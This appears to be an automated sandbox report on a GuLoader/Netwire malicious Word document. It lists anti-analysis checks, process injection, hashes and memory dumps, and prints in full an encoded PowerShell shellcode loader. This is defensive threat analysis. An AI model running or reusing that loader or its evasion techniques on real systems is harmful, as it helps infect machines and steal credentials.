guloader | 2beb372c916528fc943ad19a8e02729979cae0eae9f1f56f478f5240d2492b81

Resubmissions

04-07-2022 18:03

220704-wnazmaceg3 10

04-07-2022 17:47

220704-wc2yzaceb9 8

Analysis

max time kernel
596s
max time network
603s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-07-2022 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

evil.doc
Size

534KB
MD5

18cfa7d7480f836e32b024bbb6400f2f
SHA1

dd643576cc4a8012a6c48c73fb625e5c44d3b371
SHA256

2beb372c916528fc943ad19a8e02729979cae0eae9f1f56f478f5240d2492b81
SHA512

2389b80ae93431b3c8b6896cf9597980a956d708009dbae76dbbf933eb96378a50f877d6b59315612aaf5295ba9f06fc3c00e301c47c66d7d3654d3ac0b75421

Score

10^/10

guloader netwire botnet downloader stealer

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

Processes:

powershell.exeieinstal.exe

description	ioc	process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	powershell.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	ieinstal.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

ieinstal.exe

pid process

3468 ieinstal.exe
3468 ieinstal.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exeieinstal.exe

pid process

1976 powershell.exe
3468 ieinstal.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1976 set thread context of 3468 1976 powershell.exe ieinstal.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
3468	ieinstal.exe
3468	ieinstal.exe

pid	process
1976	powershell.exe
3468	ieinstal.exe

description	pid	process	target process
PID 1976 set thread context of 3468	1976	powershell.exe	ieinstal.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

2076 WINWORD.EXE
2076 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1976 powershell.exe
1976 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1976 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

svchost.exepowershell.exe

description pid process

Token: SeManageVolumePrivilege 744 svchost.exe
Token: SeDebugPrivilege 1976 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

WINWORD.EXE

pid process

2076 WINWORD.EXE
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

WINWORD.EXE

pid process

2076 WINWORD.EXE

pid	process
1976	powershell.exe
1976	powershell.exe

pid	process
1976	powershell.exe

description	pid	process
Token: SeManageVolumePrivilege	744	svchost.exe
Token: SeDebugPrivilege	1976	powershell.exe

Suspicious use of SetWindowsHookEx 10 IoCs

Processes:

WINWORD.EXE

pid	process
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE
2076	WINWORD.EXE

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 3836 wrote to memory of 1976	3836	WScript.exe	powershell.exe
PID 3836 wrote to memory of 1976	3836	WScript.exe	powershell.exe
PID 3836 wrote to memory of 1976	3836	WScript.exe	powershell.exe
PID 1976 wrote to memory of 1784	1976	powershell.exe	csc.exe
PID 1976 wrote to memory of 1784	1976	powershell.exe	csc.exe
PID 1976 wrote to memory of 1784	1976	powershell.exe	csc.exe
PID 1784 wrote to memory of 760	1784	csc.exe	cvtres.exe
PID 1784 wrote to memory of 760	1784	csc.exe	cvtres.exe
PID 1784 wrote to memory of 760	1784	csc.exe	cvtres.exe
PID 1976 wrote to memory of 3468	1976	powershell.exe	ieinstal.exe
PID 1976 wrote to memory of 3468	1976	powershell.exe	ieinstal.exe
PID 1976 wrote to memory of 3468	1976	powershell.exe	ieinstal.exe
PID 1976 wrote to memory of 3468	1976	powershell.exe	ieinstal.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\evil.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2076

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:2788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\bilb.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3836

C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBPAFUAVABTAFQAIABQAHIAYQBnAHQAZgAgAEIAZQB0AGgAbwByADgAIABLAE8ASQBMAE8ATgAgAEsAbgBvAGcAIABJAE4AVABFAFIAQwBPACAAVQBuAGQAZQByAGIAYQBzADQAIABTAFQARQBFAFAAIABPAHQAaQBvAHMAZQBsAHkAbQA2ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwB3AGUAZQBwAGUAcgBuADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEEAYwBhAHMAYQAoAGkAbgB0ACAAUwB3AGUAZQBwAGUAcgBuADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEQAcgB1AGMAawBlACwAaQBuAHQAIABNAE8AUgBXAFQASQBEACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAZQBlAHAAZQByAG4ALABpAG4AdAAgAEUAbABvAGgAaQBzAG0AaQBuACwAaQBuAHQAIABTAHcAZQBlAHAAZQByAG4ANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAGEAbABsAFcAaQBuAGQAbwB3AFAAcgBvAGMAQQAoAHUAaQBuAHQAIABNAE8AUgBXAFQASQBEADUALABpAG4AdAAgAE0ATwBSAFcAVABJAEQANgAsAGkAbgB0ACAATQBPAFIAVwBUAEkARAA3ACwAaQBuAHQAIABNAE8AUgBXAFQASQBEADgALABpAG4AdAAgAE0ATwBSAFcAVABJAEQAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABNAE8AUgBXAFQASQBEADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAE0ATwBSAFcAVABJAEQAMgAsAGkAbgB0ACAATQBPAFIAVwBUAEkARAAzACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEMAQQBOAE4AVQAgAEMAbwBuAGQAbwBuAGUAOAAgAGsAZQBuAGQAZQBsAHMAZQBuAG8AIABwAGgAbwBjAGEAYwBlAGEAIABEAE8ATQBGACAAUwBlAG4AZwBlAGwAaQBuAG4AMQAgAGEAcwBwAGEAcgBnAGUAIABBAGYAZgBqAGUAZAByAGUAbgBkADkAIABTAEMASABPAFQAVABLAFkAIABlAGwAdQBhACAAUQBVAEkAUABTAE8ATQAgACAADQAKACQAUwB3AGUAZQBwAGUAcgBuADMAPQAwADsADQAKACQAUwB3AGUAZQBwAGUAcgBuADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAUwB3AGUAZQBwAGUAcgBuADgAPQBbAFMAdwBlAGUAcABlAHIAbgAxAF0AOgA6AEEAYwBhAHMAYQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAdwBlAGUAcABlAHIAbgAzACwAMAAsAFsAcgBlAGYAXQAkAFMAdwBlAGUAcABlAHIAbgA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQARQBTAFAARQBSAD0AKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABJAG4AdgBpAHQAOQAiACkALgBiAHUAbgBrAGUADQAKAA0ACgAkAFMAdgByAG0AZQByAGkAZQB0AHMAOAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQARQBTAFAARQBSAC4ATABlAG4AZwB0AGgAIAAvACAAMgApAA0ACgANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABFAFMAUABFAFIALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAUwB2AHIAbQBlAHIAaQBlAHQAcwA4AFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQARQBTAFAARQBSAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAUgBlAGkAbgB0AGUAZwByAGEANgA9ADAAOwAgACQAUgBlAGkAbgB0AGUAZwByAGEANgAgAC0AbAB0ACAAJABTAHYAcgBtAGUAcgBpAGUAdABzADgALgBjAG8AdQBuAHQAIAA7ACAAJABSAGUAaQBuAHQAZQBnAHIAYQA2ACsAKwApAA0ACgB7AA0ACgAJAA0ACgBbAFMAdwBlAGUAcABlAHIAbgAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAFMAdwBlAGUAcABlAHIAbgAzACsAJABSAGUAaQBuAHQAZQBnAHIAYQA2ACwAWwByAGUAZgBdACQAUwB2AHIAbQBlAHIAaQBlAHQAcwA4AFsAJABSAGUAaQBuAHQAZQBnAHIAYQA2AF0ALAAxACkADQAKAA0ACgB9AA0ACgBbAFMAdwBlAGUAcABlAHIAbgAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBBACgAJABTAHcAZQBlAHAAZQByAG4AMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="
2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xkzm0w2g\xkzm0w2g.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES116.tmp" "c:\Users\Admin\AppData\Local\Temp\xkzm0w2g\CSCEE364B65F8641F7BE773CA8DBDB7E1B.TMP"
4⤵
PID:760

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
3⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3468

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES116.tmp

Filesize
1KB

MD5
00a932eaee832b2506e0a708914ba50d

SHA1
a3691c77947ba1f54049992250ae7f924954883d

SHA256
45d4c74056ba3dae075f4c73a01f5bb7cff3d396a08d8691f6415c43cc081369

SHA512
2742e72ddeec12bc699126dd25c4ce28834f5ebd215115e3f3339586683a0d10be104ff9423aac1c49cac4c5d2f0b193219fce210640bea4fdc34abf9af3af23

Download Submit
C:\Users\Admin\AppData\Local\Temp\xkzm0w2g\xkzm0w2g.dll

Filesize
3KB

MD5
8ce9c62f6b3fbc3feba34575e9fb4b1d

SHA1
52d3a952a139d20099e3a353370231732b449aef

SHA256
23c4a1fa8cf11aa951d3e1b50f6f2cb1914c15df59a593d7e60d86c9703f2285

SHA512
9aea2a224874148860dae30441c36b3c7f2fb31be278d0600d08b355fb737632e82104c1f19aff26e26b485c061fdb8cdab856fb1a7dd8f24028a24257b1a7b4

Download Submit
C:\Users\Admin\Desktop\bilb.vbs

Filesize
248KB

MD5
827e12e228a8d3afc27fc0dd4c912081

SHA1
92624bed58953a800af0e750fe8983a3adb4145c

SHA256
9f8a91f6c79ec804925d78c3972578da1868318874fb1d9f79a6a4d3bb2cd444

SHA512
ca8efa0261851b485efbea7a81d02303cdbfce32b2111636636f5738ea111c89cbfb471a15a1f6817608fb807eb54a2cae0d2bf0c211c63e32adb6bba96e49aa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xkzm0w2g\CSCEE364B65F8641F7BE773CA8DBDB7E1B.TMP

Filesize
652B

MD5
7dbc9e3f64319e25dea2ed4b20b244fb

SHA1
ed97ecd423ba6dcf28e67ed1cc84082553fcfea0

SHA256
94a0c1f1a9e48efc638d1b8dc82e81489c419e71345925acd683a1bbfbba7e24

SHA512
3ea1243d705e13c1f39cf9ce0c33f3a5fac7e5b16de3f3333ee237b11c817a0ab1f41215aeb94796be2d1628c16af81bad1c74326a212abc09d6baf2210897a2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xkzm0w2g\xkzm0w2g.0.cs

Filesize
534B

MD5
1b282541ab78c6c2fce0eab9cf16077e

SHA1
2b016834777e515804898044d0995e3394aecf11

SHA256
5c36aa64198ac45f703ee49f7501d6ab3507813adf187dfb3a694fc271f6c9a3

SHA512
174de6aeb8c4bd0909a540a3f8021ef31450667c21a92ae5e18b901207ca6651cd7112a3e771cafe7999b7d408c34566eb2f5edc0ce9cab5b52da664d11ace80

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xkzm0w2g\xkzm0w2g.cmdline

Filesize
369B

MD5
2f5ef64d4fa64f65f3ea5458e5d3f4b9

SHA1
877a58200ae56faf80e61583fcc79269be429c2c

SHA256
ba2b90565ac2adc9c17f269be8eb6837d1d3598aa0c29b25abfdfa71ca3f3e15

SHA512
76c54306602a53f04192aa3d7857e94c79f023b52f2726ee3e143f2fa2fb60745c7e888ff4468d5912bcb43207893f2ca3b1e0937aa3be22b1faa6f1748a021c

Download Submit
memory/744-140-0x0000014FF5F40000-0x0000014FF5F50000-memory.dmp

Filesize
64KB

Download
memory/744-139-0x0000014FF5E40000-0x0000014FF5E50000-memory.dmp

Filesize
64KB

Download
memory/760-154-0x0000000000000000-mapping.dmp

Download
memory/1784-151-0x0000000000000000-mapping.dmp

Download
memory/1976-167-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download
memory/1976-149-0x0000000007DC0000-0x000000000843A000-memory.dmp

Filesize
6.5MB

Download
memory/1976-142-0x0000000000000000-mapping.dmp

Download
memory/1976-143-0x0000000003170000-0x00000000031A6000-memory.dmp

Filesize
216KB

Download
memory/1976-144-0x0000000005850000-0x0000000005E78000-memory.dmp

Filesize
6.2MB

Download
memory/1976-145-0x0000000005EB0000-0x0000000005ED2000-memory.dmp

Filesize
136KB

Download
memory/1976-146-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/1976-147-0x0000000005FC0000-0x0000000006026000-memory.dmp

Filesize
408KB

Download
memory/1976-148-0x0000000006750000-0x000000000676E000-memory.dmp

Filesize
120KB

Download
memory/1976-159-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/1976-150-0x0000000006C90000-0x0000000006CAA000-memory.dmp

Filesize
104KB

Download
memory/1976-171-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download
memory/1976-164-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download
memory/1976-163-0x00007FFE90050000-0x00007FFE90245000-memory.dmp

Filesize
2.0MB

Download
memory/1976-173-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download
memory/1976-162-0x0000000007740000-0x0000000007DBA000-memory.dmp

Filesize
6.5MB

Download
memory/1976-161-0x0000000007740000-0x0000000007DBA000-memory.dmp

Filesize
6.5MB

Download
memory/1976-160-0x00000000089F0000-0x0000000008F94000-memory.dmp

Filesize
5.6MB

Download
memory/1976-158-0x0000000007B10000-0x0000000007BA6000-memory.dmp

Filesize
600KB

Download
memory/2076-131-0x00007FFE500D0000-0x00007FFE500E0000-memory.dmp

Filesize
64KB

Download
memory/2076-132-0x00007FFE500D0000-0x00007FFE500E0000-memory.dmp

Filesize
64KB

Download
memory/2076-136-0x00007FFE4DEF0000-0x00007FFE4DF00000-memory.dmp

Filesize
64KB

Download
memory/2076-133-0x00007FFE500D0000-0x00007FFE500E0000-memory.dmp

Filesize
64KB

Download
memory/2076-134-0x00007FFE500D0000-0x00007FFE500E0000-memory.dmp

Filesize
64KB

Download
memory/2076-130-0x00007FFE500D0000-0x00007FFE500E0000-memory.dmp

Filesize
64KB

Download
memory/2076-137-0x000001F66E7CD000-0x000001F66E7CF000-memory.dmp

Filesize
8KB

Download
memory/2076-138-0x000001F66E7CD000-0x000001F66E7CF000-memory.dmp

Filesize
8KB

Download
memory/2076-135-0x00007FFE4DEF0000-0x00007FFE4DF00000-memory.dmp

Filesize
64KB

Download
memory/3468-168-0x0000000000B10000-0x0000000000C10000-memory.dmp

Filesize
1024KB

Download
memory/3468-169-0x00007FFE90050000-0x00007FFE90245000-memory.dmp

Filesize
2.0MB

Download
memory/3468-170-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download
memory/3468-166-0x0000000000B10000-0x0000000000C10000-memory.dmp

Filesize
1024KB

Download
memory/3468-172-0x0000000000B10000-0x0000000000C10000-memory.dmp

Filesize
1024KB

Download
memory/3468-165-0x0000000000000000-mapping.dmp

Download
memory/3468-174-0x00007FFE90050000-0x00007FFE90245000-memory.dmp

Filesize
2.0MB

Download
memory/3468-175-0x0000000076F60000-0x0000000077103000-memory.dmp

Filesize
1.6MB

Download